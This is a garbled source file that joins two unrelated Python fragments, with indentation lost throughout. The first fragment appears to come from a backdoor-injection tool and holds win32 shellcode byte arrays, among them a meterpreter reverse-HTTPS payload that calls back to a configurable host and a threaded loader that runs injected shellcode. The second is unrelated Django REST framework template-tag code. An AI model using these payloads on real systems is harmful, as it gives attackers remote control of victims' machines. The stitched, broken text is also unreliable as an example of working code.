b"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
b"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
b"\x58\x58\x90\x61"
)
self.shellcode1 += b"\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
return self.stackpreserve + self.shellcode1 + self.shellcode2
def meterpreter_reverse_https_threaded(self):
"""
Traditional meterpreter reverse https shellcode from metasploit
payload/windows/meterpreter/reverse_https
"""
self.shellcode2 = b"\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += (b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
b"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
b"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
b"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<H", self.port)
self.shellcode2 += (b"\x00\x00\x53"
b"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
b"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
b"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
b"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
b"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
b"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
b"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
b"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
b"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
b"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
b"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
        self.shellcode2 += self.host.encode('ascii')
self.shellcode2 += b"\x00"
        # shellcode1: stub that allocates memory, copies shellcode2 in, and starts it in a new thread
self.shellcode1 = (b"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
b"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
b"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
b"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
b"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
b"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
b"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
b"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
b"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
b"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
b"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
b"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
b"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
b"\x5D\x90"
)
self.shellcode1 += b"\xBE"
self.shellcode1 += struct.pack("<H", len(self.shellcode2) - 5)
self.shellcode1 += b"\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += (b"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
b"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
b"\x89\xF1"
)
self.shellcode1 += b"\xeb\x44" # <--length of shellcode below
self.shellcode1 += b"\x90\x5e"
self.shellcode1 += (b"\x90\x90\x90"
b"\xF2\xA4"
b"\xE8\x20\x00\x00"
b"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
b"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
b"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
b"\x58\x58\x90\x61"
)
self.shellcode1 += b"\xE9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
return self.stackpreserve + self.shellcode1 + self.shellcode2
def demo_calc(self):
"""
win32 start calc shellcode
"""
return (b"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B"
b"\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01"
b"\xFE\x8B\x4C\x1F\x24\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
b"\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")
def demo_nop(self):
"""
just nop!
"""
return b"\x90"
def user_supplied_shellcode(self):
"""
win32 raw/binary shellcode
"""
return self.supplied_shellcode
def user_supplied_shellcode_threaded(self):
"""
        Wrap user-supplied win32 raw/binary shellcode so it runs in its own
        thread. Make sure the supplied shellcode uses a process-safe exit
        function.
"""
# Begin shellcode 2:
self.shellcode2 = b"\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += self.supplied_shellcode
self.shellcode1 = (b"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
b"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
b"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
b"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
b"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
b"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
b"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
b"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
b"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
b"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
b"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
b"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
b"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
b"\x5D\x90"
b"\xBE")
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += (b"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
b"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
b"\x89\xF1"
)
self.shellcode1 += b"\xeb\x44" # <--length of shellcode below
self.shellcode1 += b"\x90\x5e"
self.shellcode1 += (b"\x90\x90\x90"
b"\xF2\xA4"
b"\xE8\x20\x00\x00"
b"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
b"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
b"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
b"\x58\x58\x90\x61"
)
self.shellcode1 += b"\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
return self.stackpreserve + self.shellcode1 + self.shellcode2
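# Minimal usage sketch (illustrative host/port values only, not part of the
# original code): running this file directly prints the payload sizes.
if __name__ == '__main__':
    _demo = winI32_shellcode(host='192.168.1.10', port=4444,
                             supplied_shellcode=None)
    print('reverse_shell_tcp:  %d bytes' % len(_demo.reverse_shell_tcp()))
    print('demo_calc:          %d bytes' % len(_demo.demo_calc()))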
##########################################################
# END win32 shellcodes #
##########################################################
from __future__ import absolute_import, unicode_literals
import re
from collections import OrderedDict
from django import template
from django.template import loader
from django.utils import six
from django.utils.encoding import force_text, iri_to_uri
from django.utils.html import escape, format_html, smart_urlquote
from django.utils.safestring import SafeData, mark_safe
from rest_framework.compat import (
NoReverseMatch, markdown, pygments_highlight, reverse, template_render
)
from rest_framework.renderers import HTMLFormRenderer
from rest_framework.utils.urls import replace_query_param
register = template.Library()
# Regex for adding classes to html snippets
class_re = re.compile(r'(?<=class=["\'])(.*)(?=["\'])')
@register.tag(name='code')
def highlight_code(parser, token):
code = token.split_contents()[-1]
nodelist = parser.parse(('endcode',))
parser.delete_first_token()
return CodeNode(code, nodelist)
class CodeNode(template.Node):
style = 'emacs'
def __init__(self, lang, code):
self.lang = lang
self.nodelist = code
def render(self, context):
text = self.nodelist.render(context)
return pygments_highlight(text, self.lang, self.style)
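# Example template usage of the {% code %} tag above (sketch; 'python' is an
# illustrative lexer name, any Pygments lexer should work):
#
#   {% load rest_framework %}
#   {% code python %}
#   def example():
#       return 42
#   {% endcode %}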
@register.filter()
def with_location(fields, location):
return [
field for field in fields
if field.location == location
]
@register.simple_tag
def form_for_link(link):
import coreschema
properties = OrderedDict([
(field.name, field.schema or coreschema.String())
for field in link.fields
])
required = [
field.name
for field in link.fields
if field.required
]
schema = coreschema.Object(properties=properties, required=required)
return mark_safe(coreschema.render_to_form(schema))
@register.simple_tag
def render_markdown(markdown_text):
if not markdown:
return markdown_text
return mark_safe(markdown.markdown(markdown_text))
@register.simple_tag
def get_pagination_html(pager):
return pager.to_html()
@register.simple_tag
def render_form(serializer, template_pack=None):
style = {'template_pack': template_pack} if template_pack else {}
renderer = HTMLFormRenderer()
return renderer.render(serializer.data, None, {'style': style})
@register.simple_tag
def render_field(field, style):
renderer = style.get('renderer', HTMLFormRenderer())
return renderer.render_field(field, style)
@register.simple_tag
def optional_login(request):
"""
Include a login snippet if REST framework's login view is in the URLconf.
"""
try:
login_url = reverse('rest_framework:login')
except NoReverseMatch:
return ''
snippet = "<li><a href='{href}?next={next}'>Log in</a></li>"
snippet = format_html(snippet, href=login_url, next=escape(request.path))
return mark_safe(snippet)
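# Typical template usage (sketch; the surrounding markup is illustrative):
#
#   {% load rest_framework %}
#   <ul class="nav">
#     {% optional_login request %}
#   </ul>
#
# The "Log in" item only appears when the rest_framework login view is wired
# into the URLconf; otherwise the tag renders nothing.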
@register.simple_tag
def optional_docs_login(request):
"""
Include a login snippet if REST framework's login view is in the URLconf.
"""
try:
login_url = reverse('rest_framework:login')
except NoReverseMatch:
return 'log in'
snippet = "<a href='{href}?next={next}'>log in</a>"
snippet = format_html(snippet, href=login_url, next=escape(request.path))
return mark_safe(snippet)
@register.simple_tag
def optional_logout(request, user):
"""
Include a logout snippet if REST framework's logout view is in the URLconf.
"""
try:
logout_url = reverse('rest_framework:logout')
except NoReverseMatch:
snippet = format_html('<li class="navbar-text">{user}</li>', user=escape(user))
return mark_safe(snippet)
snippet = """<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
{user}
<b class="caret"></b>
</a>
<ul class="dropdown-menu">
<li><a href='{href}?next={next}'>Log out</a></li>
</ul>
</li>"""
snippet = format_html(snippet, user=escape(user), href=logout_url, next=escape(request.path))
return mark_safe(snippet)
@register.simple_tag
def add_query_param(request, key, val):
"""
Add a query parameter to the current request url, and return the new url.
"""
iri = request.get_full_path()
uri = iri_to_uri(iri)
return escape(replace_query_param(uri, key, val))
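# Example template usage (sketch; 'page' and 2 are illustrative values):
#
#   <a href="{% add_query_param request 'page' 2 %}">next page</a>
#
# which renders the current URL with the `page` query parameter set to 2,
# escaped for safe use inside an HTML attribute.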
@register.filter
def as_string(value):
if value is None:
return ''
return '%s' % value
@register.filter
def as_list_of_strings(value):
return [
'' if (item is None) else ('%s' % item)
for item in value
]
@register.filter
def add_class(value, css_class):
"""
http://stackoverflow.com/questions/4124220/django-adding-css-classes-when-rendering-form-fields-in-a-template
Inserts classes into template variables that contain HTML tags,
useful for modifying forms without needing to change the Form objects.
Usage:
{{ field.label_tag|add_class:"control-label" }}
In the case of REST Framework, the filter is used to add Bootstrap-specific
classes to the forms.
"""
html = six.text_type(value)
match = class_re.search(html)
if match:
m = re.search(r'^%s$|^%s\s|\s%s\s|\s%s$' % (css_class, css_class,
css_class, css_class),
match.group(1))
if not m:
return mark_safe(class_re.sub(match.group(1) + " " + css_class,
html))
else:
return mark_safe(html.replace('>', ' class="%s">' % css_class, 1))
return value
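# Worked example for add_class (sketch): given the rendered tag
#
#   '<label for="id_email">Email</label>'
#
# the filter call {{ value|add_class:"control-label" }} produces
#
#   '<label for="id_email" class="control-label">Email</label>'
#
# while a tag that already carries a class attribute has the new class
# appended to the existing list instead of a second attribute being added.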
@register.filter
def format_value(value):
if getattr(value, 'is_hyperlink', False):
name = six.text_type(value.obj)
return mark_safe('<a href=%s>%s</a>' % (value, escape(name)))
if value is None or isinstance(value, bool):
return mark_safe('<code>%s</code>' % {True: 'true', False: 'false', None: 'null'}[value])
elif isinstance(value, list):
if any([isinstance(item, (list, dict)) for item in value]):
template = loader.get_template('rest_framework/admin/list_value.html')
else:
template = loader.get_template('rest_framework/admin/simple_list_value.html')
context = {'value': value}
return template_render(template, context)
elif isinstance(value, dict):
template = loader.get_template('rest_framework/admin/dict_value.html')
context = {'value': value}
return template_render(template, context)
elif isinstance(value, six.string_types):
if (
(value.startswith('http:') or value.startswith('https:')) and not
re.search(r'\s', value)
):
return mark_safe('<a href="{value}">{value}</a>'.format(value=escape(value)))
elif '@' in value and not re.search(r'\s', value):
return mark_safe('<a href="mailto:{value}">{value}</a>'.format(value=escape(value)))
elif '\n' in value:
return mark_safe('<pre>%s</pre>' % escape(value))
return six.text_type(value)
@register.filter
def items(value):
"""
Simple filter to return the items of the dict. Useful when the dict may
    have a key 'items' which is resolved first in Django template dot-notation
lookup. See issue #4931
Also see: https://stackoverflow.com/questions/15416662/django-template-loop-over-dictionary-items-with-items-as-key
"""
return value.items()
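# Example template usage (sketch): iterate a dict safely even if it contains
# an 'items' key that would shadow dict.items in dot-notation lookup:
#
#   {% for key, value in data|items %}
#     {{ key }}: {{ value }}
#   {% endfor %}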
@register.filter
def schema_links(section, sec_key=None):
"""
Recursively find every link in a schema, even nested.
"""
NESTED_FORMAT = '%s > %s' # this format is used in docs/js/api.js:normalizeKeys
links = section.links
if section.data:
data = section.data.items()
for sub_section_key, sub_section in data:
new_links = schema_links(sub_section, sec_key=sub_section_key)
links.update(new_links)
if sec_key is not None:
new_links = OrderedDict()
for link_key, link in links.items():
new_key = NESTED_FORMAT % (sec_key, link_key)
new_links.update({new_key: link})
return new_links
return links
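# Example (sketch): for a top-level section whose own links are 'list' and
# 'create' and which nests a 'groups' section containing a 'list' link, the
# filter returns the keys 'list', 'create' and 'groups > list', i.e. the
# 'section > subsection' format referenced in NESTED_FORMAT above.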
@register.filter
def add_nested_class(value):
if isinstance(value, dict):
return 'class=nested'
if isinstance(value, list) and any([isinstance(item, (list, dict)) for item in value]):
return 'class=nested'
return ''
# Bunch of stuff cloned from urlize
TRAILING_PUNCTUATION = ['.', ',', ':', ';', '.)', '"', "']", "'}", "'"]
WRAPPING_PUNCTUATION = [('(', ')'), ('<', '>'), ('[', ']'), ('&lt;', '&gt;'),
                        ('"', '"'), ("'", "'")]
word_split_re = re.compile(r'(\s+)')
simple_url_re = re.compile(r'^https?://\[?\w', re.IGNORECASE)
simple_url_2_re = re.compile(r'^www\.|^(?!http)\w[^@]+\.(com|edu|gov|int|mil|net|org)$', re.IGNORECASE)
simple_email_re = re.compile(r'^\S+@\S+\.\S+$')
def smart_urlquote_wrapper(matched_url):
"""
Simple wrapper for smart_urlquote. ValueError("Invalid IPv6 URL") can
be raised here, see issue #1386
"""
try:
return smart_urlquote(matched_url)
except ValueError:
return None
@register.filter
def urlize_quoted_links(text, trim_url_limit=None, nofollow=True, autoescape=True):
"""
Converts any URLs in text into clickable links.
Works on http://, https://, www. links, and also on links ending in one of
the original seven gTLDs (.com, .edu, .gov, .int, .mil, .net, and .org).
Links can have trailing punctuation (periods, commas, close-parens) and
leading punctuation (opening parens) and it'll still do the right thing.
If trim_url_limit is not None, the URLs in link text longer than this limit
will truncated to trim_url_limit-3 characters and appended with an ellipsis.
If nofollow is True, the URLs in link text will get a rel="nofollow"
attribute.
If autoescape is True, the link text and URLs will get autoescaped.
"""
def trim_url(x, limit=trim_url_limit):
return limit is not None and (len(x) > limit and ('%s...' % x[:max(0, limit - 3)])) or x
safe_input = isinstance(text, SafeData)
words = word_split_re.split(force_text(text))
for i, word in enumerate(words):
if '.' in word or '@' in word or ':' in word:
# Deal with punctuation.
lead, middle, trail = '', word, ''
for punctuation in TRAILING_PUNCTUATION:
if middle.endswith(punctuation):
middle = middle[:-len(punctuation)]
trail = punctuation + trail
for opening, closing in WRAPPING_PUNCTUATION:
if middle.startswith(opening):
middle = middle[len(opening):]
lead = lead + opening
# Keep parentheses at the end only if they're balanced.
if (
middle.endswith(closing) and
middle.count(closing) == middle.count(opening) + 1
):
middle = middle[:-len(closing)]
trail = closing + trail
# Make URL we want to point to.
url = None
nofollow_attr = ' rel="nofollow"' if nofollow else ''
if simple_url_re.match(middle):
url = smart_urlquote_wrapper(middle)
elif simple_url_2_re.match(middle):
url = smart_urlquote_wrapper('http://%s' % middle)
elif ':' not in middle and simple_email_re.match(middle):
local, domain = middle.rsplit('@', 1)
try:
domain = domain.encode('idna').decode('ascii')
except UnicodeError:
continue
url = 'mailto:%s@%s' % (local, domain)
nofollow_attr = ''
# Make link.
if url:
trimmed = trim_url(middle)
if autoescape and not safe_input:
lead, trail = escape(lead), escape(trail)
url, trimmed = escape(url), escape(trimmed)
middle = '<a href="%s"%s>%s</a>' % (url, nofollow_attr, trimmed)
words[i] = mark_safe('%s%s%s' % (lead, middle, trail))
else:
if safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
elif safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
return ''.join(words)
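# Worked example (sketch, output shown approximately):
#
#   urlize_quoted_links('Docs at http://example.com, mail admin@example.com.')
#
# produces
#
#   'Docs at <a href="http://example.com" rel="nofollow">http://example.com</a>,'
#   ' mail <a href="mailto:admin@example.com">admin@example.com</a>.'
#
# Trailing punctuation stays outside the links, and the mailto link gets no
# rel="nofollow" attribute, as the code above shows.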
@register.filter
def break_long_headers(header):
"""
    Break headers longer than 160 characters (roughly one page width) onto
    multiple lines when possible, i.e. when they are comma separated.
"""
if len(header) > 160 and ',' in header:
header = mark_safe('<br> ' + ', <br>'.join(header.split(',')))
return header
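# Example (sketch): a comma separated header such as a long Allow or Vary
# value over 160 characters is re-joined with ', <br>' so it wraps onto one
# item per line in the rendered page; shorter headers pass through unchanged.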